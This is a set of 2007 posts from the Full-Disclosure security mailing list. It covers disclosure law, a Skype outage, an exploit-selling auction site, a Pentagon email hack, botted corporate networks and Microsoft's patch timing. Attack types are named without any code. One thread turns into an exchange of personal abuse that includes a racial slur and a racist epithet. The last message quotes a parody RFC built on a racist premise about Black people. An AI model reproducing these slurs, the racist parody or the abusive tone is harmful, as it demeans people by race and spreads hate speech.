I LOVE THE DMCA! Kevin Finisterre (lists) wrote: heh who would do such a thing? Guess we all get to wait and see who the first Guinea pig is gonna be. Hope germany has an EFF / Granick floating around to fight off some of this nonsense. -KF On Aug 28, 2007, at 6:49 PM, Blue Boar wrote: I remember people being all paranoid about the DMCA. They were worried security researchers would be sued for trying to release vulnerability information. But since that turned out to be unfounded, I guess we don't have to worry about the German thing. ;) BB Kevin Finisterre (lists) wrote: Would you have honestly provided *MORE* detail prior to the law being in effect? Doesn't the law refer to things that are intended to be used for illegal activity? I don't recall the advisories being any more verbose pre law Thanks. -KF On Aug 27, 2007, at 4:41 PM, Sergio Alvarez wrote: Hi 3APA3A, It was a mistake in the advisory, It should say: Integer cast around in UPX packed files parsing I ask for apologies for the mistake. Unfortunately we can't give more details about the vulnerability because the German Law (§202) Cheers, Sergio ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype - the voip company
Well, Its not just their logins. They also removed all downloads from their site and for a while my skype in number was not working. Something was up and it didn't seem to be too good. Nikolay Kichukov wrote: Hello, It does not seem to be OS dependent, as I am running debian lenny/sid using skype version 1.4 Beta and it cannot connect. Cheers, -Nik Tonu Samuel wrote: On Thu, 2007-08-16 at 22:19 +0200, Fabian Wenk wrote: Hello Simon Simon Smith wrote: Greetings, Does anyone know any more details about the current skype outage, other than what is being presented on their web-site? It appears that all I guess Problems with Skype login [1] does tell a little bit more. [1] http://heartbeat.skype.com/2007/08/problems_with_skype_login.html Still noone exactly knows what is going on. But there are specilations that Microsoft intentionally broke it with latest patches and Skype working hard to find solution. I do not have anything better than all others, so take it as rumour only and think twice if you use closed source including windows or skype. Tõnu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype - the voip company
Greetings, Does anyone know any more details about the current skype outage, other than what is being presented on their web-site? It appears that all skype-in telephone numbers are reporting out of service, their downloads are disabled, and login to the service is disabled. Thanks in advance. - simon -- http://www.snosoft.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Halvar Flake denied entry to USA for BlackHat
A president has an affair and we nearly impeach him. Another president ruins the country, destabilizes the middle-east even more, takes away our rights and freedom, yet we keep him in office. What gives? Don't get me wrong, I love the US and all it has to offer me as a citizen, but like most citizens I'm growing increasingly frustrated with the Bush administration. When will things actually get better? When will people start to use their voice to make things right? On 7/30/07 1:21 PM, Kristian Hermansen [EMAIL PROTECTED] wrote: http://addxorrol.blogspot.com/2007/07/ive-been-denied-entry-to-us-essentially. html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
My other hand is called Valdis :] On 7/24/07 12:06 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Mon, 23 Jul 2007 18:47:33 EDT, Kevin Finisterre (lists) said: Yeah... Adriel loves the cock. What's he call his *other* hand? :) (Well dammit, I got this big bag of Purina Troll Chow, and I need to get rid of it *somehow* :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
Kid, your posts continue to clearly demonstrate your immaturity. http://www.security-express.com/archives/fulldisclosure/2007-07/0404.html http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0372.html http://seclists.org/fulldisclosure/2007/Jul/0369.html http://seclists.org/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote: Doesn't RFI stand for remote file inclusion you ignorant jackass? J On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote: Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Not making enough money? Click here to get free info on medical jobs http://tagline.hushmail.com/fc/Ioyw6h4d93UCWauNfldnj1w6hNlG5GkZoypoFUtlgi140Vz qsFboKh/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember? On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote: But I am right, am I not? Just pointing out what everyone else was thinking already :) Anyway, if you are implying I am immature because of my ad homonym, please refer to the following: http://archives.neohapsis.com/archives/fulldisclosure/2007- 01/0380.html You should have learned from KF by now the infosec mantra 'live by the niggerdong, die by the niggerdong' J On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED] wrote: Kid, your posts continue to clearly demonstrate your immaturity. http://www.security-express.com/archives/fulldisclosure/2007- 07/0404.html http://archives.neohapsis.com/archives/fulldisclosure/2007- 07/0372.html http://seclists.org/fulldisclosure/2007/Jul/0369.html http://seclists.org/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote: Doesn't RFI stand for remote file inclusion you ignorant jackass? J On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote: Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Not making enough money? Click here to get free info on medical jobs http://tagline.hushmail.com/fc/Ioyw6h4d93UCWauNfldnj1w6hNlG5GkZoypo FUtlgi140Vz qsFboKh/ -- Click to get a free credit repair consultation, raise your FICO score http://tagline.hushmail.com/fc/Ioyw6h4d7lz4ao5ZGQpPej5hG4nLRpsNA5J5BBwM8QupVOr uN77l3H/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
Right kid... Can we also agree that you are immature? I mean, we can't lay this to rest unless we come to a compromise. Frankly, I don't feel that it would be a compromise if you didn't come half way in this relationship. While we're at it... Lets also agree that you're a coward, probably fat and lethargic... With no real friends... Who never really gets laid? Yeah I think that about sums it up... ;] On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote: No, I forgot. I now remember, thank you. As long as we agree that you were wrong, I was right, and you are an ignorant jackass who may or may not have had sexual relations with the Oreo named KF, I see no need for this thread to continue. J On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote: You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember? On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote: But I am right, am I not? Just pointing out what everyone else was thinking already :) Anyway, if you are implying I am immature because of my ad homonym, please refer to the following: http://archives.neohapsis.com/archives/fulldisclosure/2007- 01/0380.html You should have learned from KF by now the infosec mantra 'live by the niggerdong, die by the niggerdong' J On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED] wrote: Kid, your posts continue to clearly demonstrate your immaturity. http://www.security-express.com/archives/fulldisclosure/2007- 07/0404.html http://archives.neohapsis.com/archives/fulldisclosure/2007- 07/0372.html http://seclists.org/fulldisclosure/2007/Jul/0369.html http://seclists.org/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote: Doesn't RFI stand for remote file inclusion you ignorant jackass? J On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote: Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Not making enough money? Click here to get free info on medical jobs http://tagline.hushmail.com/fc/Ioyw6h4d93UCWauNfldnj1w6hNlG5GkZoypo FUtlgi140Vz qsFboKh/ -- Click to get a free credit repair consultation, raise your FICO score http://tagline.hushmail.com/fc/Ioyw6h4d7lz4ao5ZGQpPej5hG4nLRpsNA5J5 BBwM8QupVOr uN77l3H/ -- Click for free info on associates degrees and make $150K/ year http://tagline.hushmail.com/fc/Ioyw6h4dDtIwWKRMvTcjIZIDbGjdtasetV45qCTvrrjXRx1 SwjDJMB/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Am I missing anything ?
Oh so now you're calling me old? On 7/23/07 7:37 PM, Joey Mengele [EMAIL PROTECTED] wrote: LOLOLOLOLOL. I submit, you have proven your maturity. J On Mon, 23 Jul 2007 18:48:14 -0400 Simon Smith [EMAIL PROTECTED] wrote: Right kid... Can we also agree that you are immature? I mean, we can't lay this to rest unless we come to a compromise. Frankly, I don't feel that it would be a compromise if you didn't come half way in this relationship. While we're at it... Lets also agree that you're a coward, probably fat and lethargic... With no real friends... Who never really gets laid? Yeah I think that about sums it up... ;] On 7/23/07 6:40 PM, Joey Mengele [EMAIL PROTECTED] wrote: No, I forgot. I now remember, thank you. As long as we agree that you were wrong, I was right, and you are an ignorant jackass who may or may not have had sexual relations with the Oreo named KF, I see no need for this thread to continue. J On Mon, 23 Jul 2007 18:38:45 -0400 Simon Smith [EMAIL PROTECTED] wrote: You are right with respect to your RFI comment... But as far as me learning anything, don't count on it. I am after all an ignorant jackass remember? On 7/23/07 6:32 PM, Joey Mengele [EMAIL PROTECTED] wrote: But I am right, am I not? Just pointing out what everyone else was thinking already :) Anyway, if you are implying I am immature because of my ad homonym, please refer to the following: http://archives.neohapsis.com/archives/fulldisclosure/2007- 01/0380.html You should have learned from KF by now the infosec mantra 'live by the niggerdong, die by the niggerdong' J On Mon, 23 Jul 2007 18:17:53 -0400 Simon Smith [EMAIL PROTECTED] wrote: Kid, your posts continue to clearly demonstrate your immaturity. http://www.security-express.com/archives/fulldisclosure/2007- 07/0404.html http://archives.neohapsis.com/archives/fulldisclosure/2007- 07/0372.html http://seclists.org/fulldisclosure/2007/Jul/0369.html http://seclists.org/fulldisclosure/2007/Jul/0402.html Its too bad that you're such a coward man... On 7/23/07 5:51 PM, Joey Mengele [EMAIL PROTECTED] wrote: Doesn't RFI stand for remote file inclusion you ignorant jackass? J On Mon, 23 Jul 2007 17:20:56 -0400 Simon Smith [EMAIL PROTECTED] wrote: Local and Remote file inclusion, yes, you are actually missing a bunch of things.. ;) On 7/23/07 1:20 PM, Deeflàn Chakravarthÿ [EMAIL PROTECTED] wrote: Hi All, Just wondered if I am missing anything important. Am planning to give talk on web security. Is there any other technique other than the following I have to speak about ? 1)XSS 2)CSRF 3)SQL Injection 4)AJAX/JSON hijacking 5)HTTP response splitting 6)RFI 7)CRLF 8)MITM Thanks Deepan ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure- charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Not making enough money? Click here to get free info on medical jobs http://tagline.hushmail.com/fc/Ioyw6h4d93UCWauNfldnj1w6hNlG5GkZoypo FUtlgi140Vz qsFboKh/ -- Click to get a free credit repair consultation, raise your FICO score http://tagline.hushmail.com/fc/Ioyw6h4d7lz4ao5ZGQpPej5hG4nLRpsNA5J5 BBwM8QupVOr uN77l3H/ -- Click for free info on associates degrees and make $150K/ year http://tagline.hushmail.com/fc/Ioyw6h4dDtIwWKRMvTcjIZIDbGjdtasetV45 qCTvrrjXRx1 SwjDJMB/ -- Inventors: Does your idea have potential for millions? Click for info http://tagline.hushmail.com/fc/Ioyw6h4dkcnaUMsOe5nQ4NrMFQ3SiRlt5nAvPQ2aVmvq0VR WpncutX/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The Auction Site made Forbes.
Guys, Thought you might like to see this: http://www.forbes.com/home/security/2007/07/06/security-software-hacking-tec h-security-cx_ag_0706vulnmarket.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Auction Site made Forbes.
Hadn't thought about it that way... ;] Let the fun begin. On 7/9/07 4:25 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Mon, 09 Jul 2007 15:50:16 EDT, Simon Smith said: Guys, Thought you might like to see this: http://www.forbes.com/home/security/2007/07/06/security-software-hacking-tech -security-cx_ag_0706vulnmarket.html Just fsck'ing great. Now we'll have venture capitalists and arbitrage specialists and all that ilk wanting a piece of the action. You thought this was all morally murky *before*, you ain't seen nothing yet. :) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] EXPLOITS FOR SALE (AUCTION SITE)
Well, Having read what you write, I¹d also question the ethics behind such a business. If you sell your exploits through that site you do not know who will end up buying the exploits. There is no promise that the exploits will end up in good hands. On 7/6/07 2:57 PM, the electric [EMAIL PROTECTED] wrote: It didn't take long for the middleman to try to cash in on exploits. This site is selling or trying to sell zero-day and other exploits to anyone willing to pay. However, they are just a FRONT company, a middleman of sorts. Why in the hell would anyone use a middleman if they are trying to get top for their hack. I DO NOT agree with selling any exploit and I definitely believe this is stupid. But I am sure their are some dumb asses out that will use them. http://www.wslabi.com/wabisabilabi/home.do? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Damn it I hate it when other people are right... On 7/3/07 2:20 PM, secure poon [EMAIL PROTECTED] wrote: Old as in, I heard about it June 21, 2007 when the story surfaced... you are now enlightening us a whole week and a half later.. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasicarti cleId=9025442source=NLT_VVRnlid=37 On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] wrote: So they interview a non-technical, non-email using person about a hack on the pentagon? *scratches head* SNOsoft Research Team http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome? On 7/2/07 10:12 PM, secure poon [EMAIL PROTECTED] wrote: old news.. On 7/2/07, Simon Smith [EMAIL PROTECTED] wrote: Oh... And the URL would be helpful. :P http://www.computerworld.com/action/article.do?command=viewArticleBasicarti http://www.computerworld.com/action/article.do?command=viewArticleBasicamp; arti cleId=9025442source=NLT_VVRnlid=37 On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: So they interview a non-technical, non-email using person about a hack on the pentagon? *scratches head* SNOsoft Research Team http://snosoft.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ElecN
Trying to get hold of ElecN... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A Botted Fortune 500 a Day
Just to add my two cents... The fact is that the cost in damages of a single compromise is usually far greater than the cost of implementing and maintaining good security. TJX is a golden example of that. On 4/13/07 11:05 AM, Jamie Riden [EMAIL PROTECTED] wrote: Hi Steven, I believe security of an organisation is orthogonal to the number of employees/users and how savvy they are. It depends more on the will and resources to secure the network properly. Two, corporations do have many financial incentives to make sure they are secure - if they are doing their risk analyses properly, they can see that. So, yes I do expect them to fare better - a lot better - than ISPs. More comments are in-line. On 13/04/07, Steven Adair [EMAIL PROTECTED] wrote: On 13/04/07, Steven Adair [EMAIL PROTECTED] wrote: Is this in anyway surprising? I think we all know the answer is no. Many Fortune 500 companies have more employees than some ISPs have customers. Should we really expect differently? Yes! Off the top of my head: 1. Corporations should have more of an economic incentive to prevent compromises on their internal networks. E.g. TJX breach could cost company $1B - http://weblog.infoworld.com/zeroday/archives/2007/04/tjx_breach_coul.html Now, a typical spambot will cost almost nothing compared with that, but the point is you don't know the extent of the compromise until you've examined the machines involved. You list incentives but this doesn't mean I should really expect any differently. You are also equating a compromise into TJ MAXX servers for which details have not been given. I doubt and hope the same user that's an account for TJ MAXX and using e-mail isn't conencted or able to get to a server that processes credit card transactions. A compromise is a compromise and you don't know the extent until you've looked at everything. If one of your machines is spewing spam, how do you know it is also not leaking confidential data to a third party? Any compromise has the potential to be *extremely* costly. 2. Corporations have a lot more influence over their employee's behaviour than ISPs do over their customers. Customers can walk away to a new ISP with minimal fuss if sanctions are threatened. Well this is true but you seem to be missing the point of the comparison. These are large corporations with tens of thousands (some more, some less) that are geographically dispersed across the countries. This isn't a small shop of 50 elite IT users. This is probably like most other places were 90% of the users can barely use Microsoft Word and Excel. Once again.. do I expect differently? No. There is no reason for an admin to let users compromise the company's security. If the company cares about security, they can disable admin rights, lock down the firewall and run an IDS. I can buy the argument that most companies don't care sufficiently, but this is really orthogonal to the number and experience level of their users. 3. Corporations can lock down their firewalls a lot tighter than ISPs can. If my ISP blocked the way my employer does, I would be looking for a new ISP. Sure they can in some instances. How would locking down a firewall stop this e-mail from going out? Maybe you can lock down SPAM firewalls but that doesn't stop the root cause. You have 100,000 users at a Fortune 500 company with admin access to their Windows laptops. Are you going to block them form using the Internet and using e-mail? If not I am going to continue to expect them to keep getting infected. Block the infection vectors: screen email, http and ftp traffic. No personal laptops on company networks. No admin rights as far as possible. Monitor and react to new vectors and threats as they arise. Yes, I would disable people's Internet access - in fact all intranet access too. My main interaction with Cisco kit to date is shutting down Ethernet ports and re-enabling them after the problem has been resolved. If there's an incident, the plug gets pulled until someone has examined the machine, and if necessary reinstalled from known good media. 4. ISPs don't own the data on their customer's computers. Corps very much do own most of the data on their employees computers. Therefore they need to worry about confidentiality in a way that ISPs do not. Well usually corporations not only own the data on the machines, they own the computers themselves as well. You are equating a need and want for protection with what would really be expected. They have a financial incentive to look after their machines, so I do expect them to look after them. An ISP has no such incentive to look after their customer's machines. I used to look after security at a large-ish university and odd activity would stand out because there the baseline was largely 'normal' traffic. ISPs have little chance to detect 'odd' behaviour because everyone is doing 'odd'
Re: [Full-disclosure] Why Microsoft should make windows open source
I think that anyone who thinks that Microsoft is near an end is being unrealistic. I think that they are going to have to contend with the challenges imposed by open source operating systems and OSX, but they are a software giant. Also remember, Windows is not the only thing that Microsoft makes. They have their hands in a lot of different pots. On 4/4/07 11:23 AM, Troy Cregger [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 M$ will never let us h4x0rz into their source (willingly) but I agree with you James, the open source paradigm has regularly outpaced M$ and many other large corporate software producers where it comes to addressing bugs, security holes, and in many cases feature requests. I don't think too many people will agree with me on this but my feeling (call it a hunch) has been that vista will be the beginning of the end for M$. Already more and more average users (like my dad who knows jack about computers) are installing, using, and liking Linux. I guess time will tell. As to this patch, or the time M$ takes to release any patch... the word that comes to mind here is typical. After all, what can you expect from a company that is commonly referred to as Micro$loth. - -tlc James Matthews wrote: Hi Everyone (This can also be an open letter to Microsoft) Recently I have see a blog post of Microsoft's security team! What i have found disturbs me even more then when we find these 0days! This is what they write! I'm sure one question in people's minds is how we're able to release an update for this issue so quickly. I mentioned on Friday http://blogs.technet.com/msrc/archive/2007/03/30/update-on-microsoft-securit y-advisory-935423.aspx#Vulnerability that this issue was first brought to us in late December 2006 and we've been working on our investigation and a security update since then. This update was previously scheduled for release as part of the April monthly release on April 10, 2007. Are you telling me that this hole was around for just about 4 months and they did nothing about it? I am not wondering why it took them so long to come out with this patch not why they are putting out so early! Also when they were told about this vulnerability they should of fixed it right away as we have seen with the OpenBSD ICMP IP 6 hole! Core security told them about it LESS THEN A WEEK LATER THERE WAS A PATCH. So we ask why? Why does it take so long to put out a patch? Due to the increased risk to customers from these latest attacks, we were able to expedite our testing to ensure an update is ready for broad distribution sooner than April 10. Really? Then Please explain this paragraph *Disclaimer: * The information provided in this advisory is provided as is without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Links: http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-fo r-microsoft-security-advisory-935423.aspx http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-f or-microsoft-security-advisory-935423.aspx http://www.microsoft.com/technet/security/advisory/935423.mspx I can go on and on but you all get the point! James -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFGE8LvnBEWLrrYRl8RArXpAJ4+jj+m+iIAXuYw7JOyjrWxS5NmhACfV5q/ ql0ShSIP8lkYpFswZwOOb0k= =Dsmb -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] phishing sites examples source code
What kind of research are you doing? On 2/16/07 9:53 AM, M.B.Jr. [EMAIL PROTECTED] wrote: social-engineering-beggars... On 2/16/07, Andres Riancho [EMAIL PROTECTED] wrote: Hi, For a research i'm doing I need a somehow big(around 100 would be nice...) amount of phishing sites html code . I have googled for them but I only get a lot of screenshots of those sites, not the actual code. Anyone has an idea of where I could get those sites html ? Cheers, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pedophiles On YouTube (ringleader Irish282)
murdered to death. Isn't that the point of murder? You don't murder someone to life, or to hospitalization. The department of redundancy department... ;] On 2/13/07 10:08 AM, Siim Põder [EMAIL PROTECTED] wrote: Yo! TheGesus wrote: On 2/12/07, Nicholas Winn [EMAIL PROTECTED] wrote: And I assume your not full of shit and have proof of this because? I think the forward this email to everyone you know line should have been enough to set off anyone's bullshit alarm. No need to worry. Since receiving this e-mail I have murdered irish282 to death with my bare hands. Yours truly, MC anonymous. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New Transport Protocol RFC - Darknet
The fact that you actually have the time in your day to write such trash clearly demonstrates that you have no social life. It must really suck to be a friendless loser. I truly feel bad for you. On 2/10/07 3:56 PM, Pedro Martinez [EMAIL PROTECTED] wrote: Darknet is a next generation black-hat data transport protocol. This is an RFC Proposal. __ __ Sucker-punch spam with award-winning protection. Try the free Yahoo! Mail Beta. http://advision.webevents.yahoo.com/mailbeta/features_spam.html Network Working Group J. Evers Internet-Draft Bantown Consulting, Inc. Intended status: Standards Track November 2006 Expires: May 5, 2007 A Standard for the Transmission of IP Datagrams Using the Negro darknet.txt Status of this Memo This document is an Internet-Draft and is NOT offered in accordance with Section 10 of RFC 2026, and the author does not provide the IETF with any rights other than to publish as an Internet-Draft. Internet-Drafts are working documents of the Internet Engineering Task Force (IETF), its areas, and its working groups. Note that other groups may also distribute working documents as Internet- Drafts. Internet-Drafts are draft documents valid for a maximum of six months and may be updated, replaced, or obsoleted by other documents at any time. It is inappropriate to use Internet-Drafts as reference material or to cite them other than as work in progress. The list of current Internet-Drafts can be accessed at http://www.ietf.org/ietf/1id-abstracts.txt. The list of Internet-Draft Shadow Directories can be accessed at http://www.ietf.org/shadow.html. This Internet-Draft will expire on May 5, 2007. Evers Expires May 5, 2007 [Page 1] Internet-Draft DarkNet November 2006 Abstract This document presents a novel new technique for the transmission of IP Datagrams using the dark-skinned Negroid race as a physical-layer transport. Table of Contents 1. Background . . . . . . . . . . . . . . . . . . . . . . . . ancho 2. Frame Encoding and Transmission . . . . . . . . . . . . . . ancho 2.1. Encryption and Encapsulation . . . . . . . . . . . . . ancho 2.2. Ready to Send . . . . . . . . . . . . . . . . . . . . . ancho 2.3. Transmission . . . . . . . . . . . . . . . . . . . . . ancho 2.4. Decoding . . . . . . . . . . . . . . . . . . . . . . . ancho 3. Technical Notes . . . . . . . . . . . . . . . . . . . . . . ancho 3.1. TTL . . . . . 